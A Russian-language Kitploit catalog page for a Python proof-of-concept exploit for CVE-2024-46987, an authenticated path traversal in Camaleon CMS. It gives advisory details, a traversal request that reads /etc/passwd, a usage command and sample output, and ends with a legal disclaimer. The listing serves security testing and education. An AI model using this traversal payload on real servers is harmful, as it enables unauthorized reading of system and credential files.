Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-46987 — Эксплойт, созданный с использованием Python | Kitploit
Инструменты/GitHubGitHub/advaitpathak21/cve-2024-46987
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеОбучение и Образование
GitHubadvaitpathak21/cve-2024-46987

CVE-2024-46987

Эксплойт, созданный с использованием Python

Репозиторий
17 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-46987 – Обход пути с аутентификацией / Чтение произвольных файлов в Camaleon CMS

CVSS 7.7 High Python PoC

CVE-2024-46987 — это уязвимость обхода пути с аутентификацией (CWE-22) в Camaleon CMS (система управления контентом на Ruby on Rails). Она позволяет авторизованному пользователю (даже с низкими привилегиями) читать произвольные файлы на сервере через действие MediaController#download_private_file.

  • Опубликовано: 18 сентября 2024
  • CVSS v3.1: 7.7 Высокий
    Вектор: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  • CWE: CWE-22 (Недостаточное ограничение имени пути в каталоге), CWE-200 (Раскрытие конфиденциальной информации)
  • Затронутые версии: Camaleon CMS ≤ 2.8.0 (некоторые сообщения отмечают, что также работает на 2.9.0)
  • Исправлено в: ≥ 2.8.2 (рекомендуется обновление до последней 2.8.x или 2.9.x)
  • Advisories:
  • GitHub Advisory GHSA-cp65-5m9r-vc2c
  • NVD CVE-2024-46987
  • GitHub Security Lab GHSL-2024-183

Обзор уязвимости

Злоумышленник с действительными учетными данными может отправить специально сформированный запрос по адресу: /admin/media/download_private_file?file=../../../../etc/passwd

Установка зависимостей

  • pip install -r requirements.txt

ИЛИ

  • pip install -r requests fire

Использование

  • Сначала создайте нового пользователя
root@kitploit:~
python cms-exploit.py \
  --url http://target.local \
  --username neal \
  --password 'Caffery@123' \
  --cmd /etc/passwd
  • Пример вывода:
root@kitploit:~
[+] Login successful
[*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Success – content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.

Примечание: Скрипт предполагает использование формы входа в стиле Rails (user[email], user[password], authenticity_token). Измените поля полезной нагрузки, если ваша цель использует нестандартные имена.

Правовое и этическое предупреждение

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности.

Используйте только на системах, которыми вы владеете, или на которые имеете явное письменное разрешение на тестирование (например, программы bug bounty, внутренние пентесты, лаборатории вроде HTB). Несанкционированное использование может нарушать законы. Автор не несет ответственности за неправомерное использование.

Скачать инструмент